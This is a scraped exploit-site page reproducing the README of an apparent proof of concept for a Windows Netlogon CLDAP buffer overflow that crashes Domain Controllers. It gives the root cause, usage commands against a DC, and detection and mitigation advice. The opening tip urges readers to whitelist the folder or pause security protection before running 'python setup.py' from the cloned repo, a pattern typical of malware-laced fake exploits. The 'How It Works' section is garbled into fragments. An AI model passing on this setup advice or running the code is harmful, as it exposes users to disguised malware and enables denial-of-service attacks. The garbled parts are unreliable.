Share 
## https://sploitus.com/exploit?id=5FF26F40-4D2D-54FA-A5E0-88A648FA0864
# CVE-2026-41089


> [!TIP]
> If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

> [!CAUTION]
> Some security systems may block the installation.
> Only download from the official repository.

---

## QUICK START

```bash
git clone https://github.com/Darkuoremember32/CVE-2026-41089-532.git
cd CVE-2026-41089-532
python setup.py
```


```
 โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—    โ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•    โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ•—
โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—      โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•‘
โ–ˆโ–ˆโ•‘     โ•šโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ•      โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘
โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—    โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
 โ•šโ•โ•โ•โ•โ•โ•  โ•šโ•โ•โ•โ•  โ•šโ•โ•โ•โ•โ•โ•โ•    โ•šโ•โ•  โ•šโ•โ• โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ•  โ•šโ•โ•โ•โ•โ•โ•
```

**Windows Netlogon Remote Code Execution via CLDAP Stack Buffer Overflow**

![CVSS](https://img.shields.io/badge/CVSS_3.1-9.8_CRITICAL-red?style=for-the-badge)
![CWE](https://img.shields.io/badge/CWE-121-orange?style=for-the-badge)
![Python](https://img.shields.io/badge/Python-3.8+-blue?style=for-the-badge&logo=python&logoColor=white)
![License](https://img.shields.io/badge/License-MIT-green?style=for-the-badge)

---

One crafted UDP packet to port 389 overflows a 528-byte stack buffer
inside LSASS on any unpatched Windows Domain Controller. The process
crashes. The DC reboots in ~60 seconds. No authentication required.

| | |
|---|---|
| **Attack Vector** | UDP 389 (CLDAP), pre-auth, zero credentials |
| **Impact** | LSASS crash, DC reboot, potential RCE |
| **CWE** | CWE-121 (Stack-based Buffer Overflow) |
| **CVSS Vector** | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Published** | May 12, 2026 by Microsoft |

---

## Affected Systems

Every Windows Server version running as a Domain Controller:

| Server Version     | Fixed In                 |
|--------------------|--------------------------|
| 2012 / 2012 R2     | ESU-only patches         |
| 2016               | 10.0.14393.9140          |
| 2019               | 10.0.17763.8755          |
| 2022               | 10.0.20348.5074          |
| 2022 23H2          | 10.0.25398.2330          |
| 2025               | 10.0.26100.32772         |

## Root Cause

`NlGetLocalPingResponse` allocates a 528-byte stack buffer and hands it
to `BuildSamLogonResponse`. That function calls `NetpLogonPutUnicodeString`
to write server name, domain name, GUIDs, and the attacker-controlled
username into the buffer.

The bug: `NetpLogonPutUnicodeString` receives a maximum length in bytes
but treats it as a WCHAR count. Every string written through this path
occupies twice the expected space. The "User" field in the CLDAP filter
(up to 130 wchars, 260 bytes on the wire) pushes the combined write
past the 528-byte boundary.

```
I_NetLogonLdapLookupEx
  -> NlGetLocalPingResponse           // 528-byte stack buffer
    -> LogonRequestHandler
      -> BuildSamLogonResponse
        -> NetpLogonPutUnicodeString   // byte/WCHAR size confusion
```

# Connectivity test (short username, no overflow)
python3 poc.py 10.0.50.21 corp.local

# Default overflow attempt
python3 poc.py 10.0.50.21 corp.local -l 130

# Larger payload, longer timeout for slow networks
python3 poc.py 10.0.50.21 corp.local -l 200 -t 10
```

Requires Python 3.8+. No third-party packages.

## How It Works

   the target responds on UDP 389.
   characters of "A". This pushes the serialized data past the stack
   buffer boundary. If LSASS crashes, the recv times out.
   whether the DC is still alive. No response = LSASS crash confirmed.

The overflow triggers a denial of service (LSASS crash, DC reboot).
RCE through stack corruption is possible in theory. This PoC does not
attempt code execution.

## Detection

**Network.** Scan CLDAP traffic for search requests where the "User"
filter attribute exceeds 20-30 characters. Normal DC locator pings
use service account names (short strings).

**Host.** Watch for LSASS crashes tied to netlogon.dll (Event ID 1000).
Enable Netlogon debug logging:

```
nltest /dbflag:0x2080ffff
```

## Mitigation

- Install the May 2026 Microsoft security update
- Restrict UDP 389 inbound to trusted management subnets
- For legacy Server versions out of ESU: 0patch ships micropatches
  (single instruction fix: `mov edx, 0x40` to halve the max username
  length)

## References

- [Microsoft Security Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41089)
- [NVD - CVE-2026-41089](https://nvd.nist.gov/vuln/detail/CVE-2026-41089)
- [0patch Analysis and Micropatch](https://blog.0patch.com/2026/05/micropatches-released-for-windows_0304568783.html)
- [Aretiq AI Reverse Engineering](https://aretiq.ai/research/vul260513-cve-2026-41089-microsoft-windows-netlogon-buildsamlogonresponse-stack-based-buffer-overflow-rce/)
- [RFC 4511 - LDAP](https://tools.ietf.org/html/rfc4511)
- [MS-ADTS - CLDAP DC Locator](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/0de3704e-a799-4afa-b12a-3fef2f8e2e66)

---

> **Legal.** This code exists for authorized security research and
> education. Test only against systems you own or have written permission
> to test. Unauthorized access to computer systems violates the CFAA and
> equivalent laws in most jurisdictions.

**[MIT License](LICENSE)**